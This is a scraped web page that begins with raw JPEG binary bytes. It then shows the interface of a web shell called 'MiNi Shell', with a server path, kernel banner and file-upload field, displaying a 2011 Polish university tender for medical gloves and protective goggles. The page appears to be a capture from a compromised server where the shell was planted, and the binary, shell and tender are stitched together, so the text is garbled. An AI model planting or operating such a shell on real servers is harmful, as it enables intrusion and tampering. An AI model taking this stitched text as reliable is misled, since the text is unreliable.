JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110518/118444-N-2011.html

<p class="kh_header"><b>Lublin: Dostawa rękawic medycznych i gospodarczych oraz okularów ochronnych; Nr sprawy UM-ZP-262-46/11</b><br>
<b>Numer ogłoszenia: 118444 - 2011; data zamieszczenia: 18.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Lublinie , Al. Racławickie 1, 20-059 Lublin, woj. lubelskie, tel. 81 528 88 88, faks 81 528 89 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa rękawic medycznych i gospodarczych oraz okularów ochronnych; Nr sprawy UM-ZP-262-46/11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa rękawic medycznych i gospodarczych oraz okularów ochronnych zwanych dalej produktami dla Uniwersytetu Medycznego w Lublinie. Szczegółowy opis przedmiotu zamówienia zawarty jest w  formularzu cenowym / opis przedmiotu zamówienia stanowiący odpowiednio załączniki nr 6, 7  i 8 do niniejszej SIWZ wg następujących zadań:
Zadanie nr 1 - Rękawice zabiegowe i chirurgiczne - wg załącznika nr 6 do niniejszej SIWZ
Zadanie nr 2 - Rękawice sekcyjne - wg załącznika nr 7 do niniejszej SIWZ
Zadanie nr 3 - Rękawice gospodarcze i okulary - wg załącznika nr 8 do niniejszej SIWZ
Wymagania dotyczące przedmiotu zamówienia:
1. Zamawiający wymaga, aby zaoferowany przez Wykonawcę asortyment posiadał aktualne dopuszczenie do obrotu na rynku polskim.
2. Na każdym opakowaniu jednostkowym i zbiorczym  musi znajdować się: nazwa rękawic, rodzaj, rozmiar, data produkcji, seria, data przydatności do użytku, nazwa producenta zgodnie z normą PN -EN 980 w zakresie zadań 1 i 3.
3. Zamawiający wymaga aby okres ważności ( przydatności do użycia) wynosił ? pełnego okresu ważności określony przez producenta danego asortymentu.
4. Ewentualne wskazanie w opisie przedmiotu zamówienia symbolu, nazwy lub producenta ma na celu określenie klasy produktu, jego jakości oraz służą ustaleniu standardu produktu, nie wskazują natomiast na konkretny wyrób lub konkretnego producenta.
5. Wszędzie tam gdzie w opisie przedmiotu zamówienia zawartym w niniejszym SIWZ wskazane zostały normy, znaki towarowe, patenty, pochodzenie Zamawiający dopuszcza oferty równoważne. Za rozwiązania równoważne Zamawiający uzna te produkty, które spełniają wszystkie wymagania Zamawiającego, ( w szczególności parametry jakościowe i użytkowe o przeznaczeniu) i są identyczne lub nie gorsze od wskazanych w załączniku nr 6, 7 i 8 do niniejszej SIWZ.
6. Wykonawca który zaoferuje równoważne produkty do opisanych w SIWZ obowiązany jest w myśl art. 30 ust. 5 Pzp wykazać że oferowane przez niego dostawy ( produkty) spełniają wymagania określone przez Zamawiającego.
7. Dostarczone produkty muszą posiadać nienaruszone cechy pierwotnego opakowania.
8. Zamawiający zastrzega sobie prawo niewykorzystania pełnego zakresu ilościowo - asortymentowego określonego w załączniku nr 6, 7 i 8 do SIWZ. Wykonawcy nie będą przysługiwały w takim przypadku żadne roszczenia wobec Zamawiającego. Niezrealizowana wartość umowy nie może być większa niż.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.14.14.20-0, 18.14.10.00-9, 18.14.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. W celu potwierdzenia, że oferowane produkty odpowiadają wymaganiom określonym przez Zamawiającego w pkt. 1 w ofercie należy złożyć, odpowiednio dla zadań na które składana jest oferta:
1.1. Dokumenty ( tj. deklaracja zgodności lub certyfikat zgodności lub wpis do rejestru wyrobów Medycznych lub zgłoszenie do Rejestru Wyrobów Medycznych) potwierdzających zgodność oferowanego przedmiotu zamówienia z wymaganiami zasadniczymi w rozumieniu ustawy o wyrobach medycznych ( Dz. U. 2010 Nr 107 poz.679), właściwe dla klasy oferowanego wyrobu medycznego.
1.2. dokumenty ( certyfikaty lub deklaracje zgodności producenta) potwierdzające, że oferowane rękawice odpowiadają normom: PN EN 374-1 Rękawice chroniące przed chemikaliami i mikroorganizmami. Część 1: Terminologia i wymagania ; PN EN 374-2:2004  Rękawice chroniące przed chemikaliami i mikroorganizmami. Część 2 Wyznaczanie odporności na przesiąkanie; PN EN 374-2:2004  Rękawice chroniące przed chemikaliami i mikroorganizmami. Część 3 Wyznaczanie odporności na przenikanie chemikaliów; PN EN 420 Rękawice ochronne - Wymagania ogólne i metody badań, PN -EN 388:2006 Rękawice chroniące przed zagrożeniami mechanicznymi, PN EN 556 Sterylizacja wyrobów medycznych - Wymagania dotyczące wyrobów medycznych określanych jako sterylne - Część 1 Wymagania dotyczące finalnie sterylizowanych wyrobów medycznych; PN EN 980  Symbole graficzne do stosowania w oznakowaniu wyrobów medycznych; PN EN 552 Sterylizacja wyrobów medycznych - Walidacja i rutynowa kontrola sterylizacji metodą napromieniowania; PN EN ISO 13485 Wyroby medyczne  - Systemy zarządzania jakością - Wymagania dla celów przepisów prawnych; PN - EN 455-1: 2004 Rękawice medyczne do jednorazowego użytku - część 1 Wymagania i badania na nieobecność dziur, PN-EN 455 -2 : 2010  Rękawice medyczne do jednorazowego użytku - Część 2: Wymagania i badania dotyczące właściwości fizycznych oraz PN -EN 455-3 2007 Rękawice medyczne do jednorazowego użytku - Część 3 Wymagania i badania w ocenie biologicznej - w zakresie zadania nr  1
1.3. dokumenty ( certyfikaty lub deklaracje zgodności producenta) potwierdzające, że oferowane rękawice odpowiadają normom: PN -EN 420:2005  Rękawice ochronne - Wymagania ogólne i metody badań, PN -EN 388:2006 Rękawice chroniące przed zagrożeniami mechanicznymi, ; PN EN 388 (poziom odporności 1-2-4-x i 2-5-4-2); PN-EN 374-1: 2005 Rękawice chroniące przed substancjami chemicznymi i mikroorganizmami, Część 1: Terminologia i wymagania , PN-EN 12477:2005 Rękawice ochronne dla spawaczy, PN -EN 60903:2006 Prace pod napięciem - Rękawice z materiału izolacyjnego; PN-EN 166:2005 Ochrona indywidualna oczu -Wymagania; PN-EN 172:2000  Ochrona indywidualna oczu - Filtry chroniące przed olśnieniem słonecznym, do zastosowań; PN-EN 168:2005 Ochrona indywidualna oczu - Nie optyczne metody badań - w zakresie zadania nr 3 
1.4. dokumenty tj. aktualna kartę charakterystyki producenta oferowanego przedmiotu zamówienia w zakresie zadań 1, 2 i 3.
 Zaleca się aby dokumenty były opisane z podaniem którego zadania i pozycji  dotyczą.
1.5. Próbki oferowanych produktów w zakresie :
2.5.1.	zadania nr 1 pozycje nr : 1, 2, 3 ,5, 6, 8, 9, 10,11, 14,15
2.5.2.	zadanie nr 2 
2.5.3. zadanie nr 3 pozycje nr: 1, 10,11, 14
- w ilości min. po 2 pary dla każdej w/w pozycji. w zadaniu nr 1 i 2, z każdego rozmiaru wraz z instrukcjami używania i etykietami wyrobu w języku polskim.
Zaleca się aby próbki oferowanych produktów były oddzielnie zapakowane od oferty i oznaczone numerem zadania i pozycji której dotyczą oraz opatrzone nazwą Wykonawcy.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosownie do treści § 4 ust. 1 rozporządzenia, zamiast dokumentów, o których mowa w punkcie 2: ppkt. 2.2. - Wykonawca składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2. Dokumenty, o których mowa w pkt. 3 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa 
w pkt. 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapis pkt. 4. stosuje się odpowiednio. Dokument ten winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4. W przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
5.Jeżeli Wykonawca, polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, to zobowiązany jest również przedłożyć:
5.1. Pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
5.2.Oświadczenie i dokumenty dotyczące tych podmiotów, wymienione w punkcie III.4.2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień niniejszej umowy może nastąpić w formie pisemnego aneksu pod rygorem nieważności w następujących przypadkach:
1.1. zaprzestania produkcji lub wycofania z obrotu przedmiotu umowy. Wykonawca zaproponuje inny zamienny produkt spełniający parametry określone w opisie przedmiotu zamówienia, przy czym cena zastępczego produktu nie może być wyższa niż cena jednostkowa netto zastępowanego produktu wskazanego w zał. nr  do niniejszej umowy 
1.2. zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego;
1.3. zmiany stawki podatku VAT. Cena brutto ulegnie zmniejszeniu w przypadku obniżenia stawki podatku od towarów i usług lub powiększeniu w przypadku podwyższenia stawki podatku od towarów i usług. 
1.4. konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony, zmiana nie może spowodować zmiany ceny wynikającej z oferty Wykonawcy;
1.5. konieczności zmiany osób przewidzianych do wzajemnego współdziałania, lub wykonania przedmiotu umowy;
1.6. wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia;
1.7. wprowadzenia nowej technologii, lub innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca powinien ją odpowiednio obniżyć;
1.8. konieczności zastąpienia przedmiotem równoważnym lub o wyższych parametrach jakościowych
1.9. Zamawiający przewiduje ewentualną zmianę terminu obowiązywania umowy w przypadku:
1.9.1. Wcześniejszego jej zrealizowania w zakresie dostaw asortymentu - wówczas umowa wygasa automatycznie;
1.9.2. Niewyczerpanie ilości i wartości umowy w okresie jej obowiązywania  - umowa może zostać przedłużona do wyczerpania ilości przedmiotu i wartości umowy nie dłużej jednak niż o 3 lata
2. Inicjatorem zmian może być Zamawiający lub Wykonawca poprzez pisemne wystąpienie w okresie obowiązywania umowy zawierające uzasadnienie proponowanych zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umlub.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1) strona internetowa j.w., 2) Osoba wyznaczona do kontaktów Agnieszka Czajka e-mail: agnieszka.czajka@umlub.pl, tel: (81) 528-89-67, fax: (81) 528-89-54.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 11:00, miejsce: Siedziba Zamawiającego Al. Racłwickie 1, 20 - 059 Lublin pok. 22 ( Kancelari Ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rękawice zabiegowe i chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa rękawic medycznych i gospodarczych oraz okularów ochronnych zwanych dalej produktami dla Uniwersytetu Medycznego w Lublinie. Szczegółowy opis przedmiotu zamówienia zawarty jest w  formularzu cenowym / opis przedmiotu zamówienia stanowiący odpowiednio załączniki nr 6, 7  i 8 do niniejszej SIWZ wg następujących zadań:
Zadanie nr 1 - Rękawice zabiegowe i diagnostyczne - wg załącznika nr 6 do niniejszej SIWZ
Zadanie nr 2 - Rękawice sekcyjne - wg załącznika nr 7 do niniejszej SIWZ
Zadanie nr 3 - Rękawice gospodarcze i okulary - wg załącznika nr 8 do niniejszej SIWZ
Wymagania dotyczące przedmiotu zamówienia:
1. Zamawiający wymaga, aby zaoferowany przez Wykonawcę asortyment posiadał aktualne dopuszczenie do obrotu na rynku polskim.
2. Na każdym opakowaniu jednostkowym i zbiorczym  musi znajdować się: nazwa rękawic, rodzaj, rozmiar, data produkcji, seria, data przydatności do użytku, nazwa producenta zgodnie z normą PN -EN 980 w zakresie zadań 1 i 3.
3. Zamawiający wymaga aby okres ważności ( przydatności do użycia) wynosił ? pełnego okresu ważności określony przez producenta danego asortymentu.
4. Ewentualne wskazanie w opisie przedmiotu zamówienia symbolu, nazwy lub producenta ma na celu określenie klasy produktu, jego jakości oraz służą ustaleniu standardu produktu, nie wskazują natomiast na konkretny wyrób lub konkretnego producenta.
5. Wszędzie tam gdzie w opisie przedmiotu zamówienia zawartym w niniejszym SIWZ wskazane zostały normy, znaki towarowe, patenty, pochodzenie Zamawiający dopuszcza oferty równoważne. Za rozwiązania równoważne Zamawiający uzna te produkty, które spełniają wszystkie wymagania Zamawiającego, ( w szczególności parametry jakościowe i użytkowe o przeznaczeniu) i są identyczne lub nie gorsze od wskazanych w załączniku nr 6, 7 i 8 do niniejszej SIWZ.
6. Wykonawca który zaoferuje równoważne produkty do opisanych w SIWZ obowiązany jest w myśl art. 30 ust. 5 Pzp wykazać że oferowane przez niego dostawy ( produkty) spełniają wymagania określone przez Zamawiającego.
7. Dostarczone produkty muszą posiadać nienaruszone cechy pierwotnego opakowania.
8. Zamawiający zastrzega sobie prawo niewykorzystania pełnego zakresu ilościowo - asortymentowego określonego w załączniku nr 6, 7 i 8 do SIWZ. Wykonawcy nie będą przysługiwały w takim przypadku żadne roszczenia wobec Zamawiającego. Niezrealizowana wartość umowy nie może być większa niż 20 % wartości umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0, 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rękawice sekcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa rękawic medycznych i gospodarczych oraz okularów ochronnych zwanych dalej produktami dla Uniwersytetu Medycznego w Lublinie. Szczegółowy opis przedmiotu zamówienia zawarty jest w  formularzu cenowym / opis przedmiotu zamówienia stanowiący odpowiednio załączniki nr 6, 7  i 8 do niniejszej SIWZ wg następujących zadań:
Zadanie nr 1 - Rękawice zabiegowe i diagnostyczne - wg załącznika nr 6 do niniejszej SIWZ
Zadanie nr 2 - Rękawice sekcyjne - wg załącznika nr 7 do niniejszej SIWZ
Zadanie nr 3 - Rękawice gospodarcze i okulary - wg załącznika nr 8 do niniejszej SIWZ
Wymagania dotyczące przedmiotu zamówienia:
1. Zamawiający wymaga, aby zaoferowany przez Wykonawcę asortyment posiadał aktualne dopuszczenie do obrotu na rynku polskim.
2. Na każdym opakowaniu jednostkowym i zbiorczym  musi znajdować się: nazwa rękawic, rodzaj, rozmiar, data produkcji, seria, data przydatności do użytku, nazwa producenta zgodnie z normą PN -EN 980 w zakresie zadań 1 i 3.
3. Zamawiający wymaga aby okres ważności ( przydatności do użycia) wynosił ? pełnego okresu ważności określony przez producenta danego asortymentu.
4. Ewentualne wskazanie w opisie przedmiotu zamówienia symbolu, nazwy lub producenta ma na celu określenie klasy produktu, jego jakości oraz służą ustaleniu standardu produktu, nie wskazują natomiast na konkretny wyrób lub konkretnego producenta.
